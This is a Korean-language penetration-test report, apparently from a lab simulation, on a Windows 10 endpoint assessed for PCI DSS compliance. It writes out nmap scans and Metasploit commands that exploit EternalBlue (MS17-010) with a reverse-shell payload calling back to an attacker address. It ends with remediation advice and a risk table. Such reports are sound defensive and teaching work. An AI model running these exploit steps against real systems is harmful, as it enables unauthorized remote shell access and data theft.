
이 보고서는 금융 중심 인프라 내 Windows 10 머신에서 PCI DSS 규정 준수, SMB 서비스 열거, CVE-2017-0144(EternalBlue) 악용에 초점을 맞춘 구조화된 VAPT 수행 내용을 설명합니다.
금융 기관은 사이버보안 분야에서 가장 엄격한 규정 준수 요구 사항 중 일부에 직면합니다. 민감한 고객 데이터와 카드 소지자 정보가 위험에 처해 있기 때문에 보안 구성 오류는 치명적인 침해로 이어질 수 있습니다. 이 VAPT 시뮬레이션은 PCI DSS 규정 준수 관점에서 Windows 10 기반 엔드포인트 시스템의 보안 태세를 평가하고, 노출된 SMB 서비스의 알려진 취약점을 식별 및 익스플로잇하기 위해 수행되었습니다.
시뮬레이션은 Nessus를 사용한 정찰 및 취약점 스캐닝부터 Metasploit을 통한 실제 익스플로잇까지 여러 단계를 포함합니다. 보고서는 금융 네트워크의 무결성을 유지하는 데 있어 엔드포인트 강화, 패치 관리, 방화벽 시행 및 PCI DSS 정렬의 중요성을 더욱 강조합니다.
작성자: Aditya Bhatt
직위: VAPT 분석가 | 사이버보안 전문가
연락처: [email protected] | +91-9818993884
이 보고서는 금융 데이터 및 신용 카드 거래를 처리할 것으로 의심되는 Windows 10 엔드포인트에 수행된 침투 테스트 결과를 제시합니다. 목표는 PCI DSS 제어 구현을 검증하고 카드 소지자 데이터를 손상시킬 수 있는 잠재적 공격 벡터를 식별하는 것이었습니다.
Nessus를 사용하여 호스트가 CVE-2017-0144 (EternalBlue) – 중요한 SMB 취약점 – 에 취약한 것으로 발견되었습니다. 그런 다음 Metasploit 프레임워크를 사용하여 이 결함을 익스플로잇하고 무단 원격 셀 액세스를 획득했습니다. 이 보고서는 금융 시스템의 데이터 침해를 방지하기 위해 적시에 패치를 관리하고 네트워크 서비스를 강화하는 것의 중요성을 강조합니다.
PCI DSS의 6가지 주요 목표와 12가지 요구 사항이 검토되었습니다. 주요 원칙은 다음과 같습니다.
대상 시스템:
10.10.195.105255.0.0.0사용된 도구:
주요 명령어:
nmap -sn 10.10.195.105
nmap -sV -p445 10.10.195.105
nmap -F 10.10.195.105
스캐너:
Nessus 스캔 시도:
Metasploit 스캔 시도:
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run
익스플로잇 모듈:
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit
패치 관리
네트워크 강화
방화벽 시행
지속적인 모니터링
PCI DSS 준수
인식 교육
이 수행은 SMBv1과 같은 패치되지 않고 오래된 서비스가 공개적으로 알려진 익스플로잇을 사용하여 완전한 시스템 손상으로 이어질 수 있음을 명확히 입증했습니다. 여기서 익스플로잇된 EternalBlue 취약점은 금융 인프라에서 적시 패치, 서비스 최소화 및 사전 예방적 스캐닝이 불가피한 이유를 보여주는 전형적인 예입니다.
PCI DSS와 같은 프레임워크에 대한 규정 준수 없이 조직은 법적 처벌과 치명적인 데이터 침해 모두의 위험을 감수합니다.
보안 격차는 종종 레거시 프로토콜과 잊혀진 패치 뒤에 숨어 있습니다. 이 수행은 특히 SMB와 같은 모든 서비스를 편의가 아닌 위험 표면으로 취급하는 것의 중요성을 재확인했습니다.
금융 부문의 강력한 사이버보안은 지속적인 경계, 시행된 정책 및 타협 없는 패치 관리에서 시작됩니다.
보고서를 읽어주셔서 감사합니다. 이 보고서가 명확성과 실질적인 통찰력을 제공하고, 특히 금융 데이터를 처리할 때 지속적인 보안 검증이 왜 필수적인지 강화하는 데 도움이 되었기를 바랍니다.
– Aditya Bhatt
VAPT 분석가 | 사이버보안 전문가
| 위험 설명 | 영향 | 가능성 | 위험 점수 |
|---|
| EternalBlue 익스플로잇 (SMBv1) | 높음 | 높음 | 심각 |
| 패치 관리 부족 | 높음 | 중간 | 높음 |
| 네트워크 액세스 제어 부재 | 중간 | 높음 | 높음 |
| PCI DSS 미준수 | 높음 | 높음 | 심각 |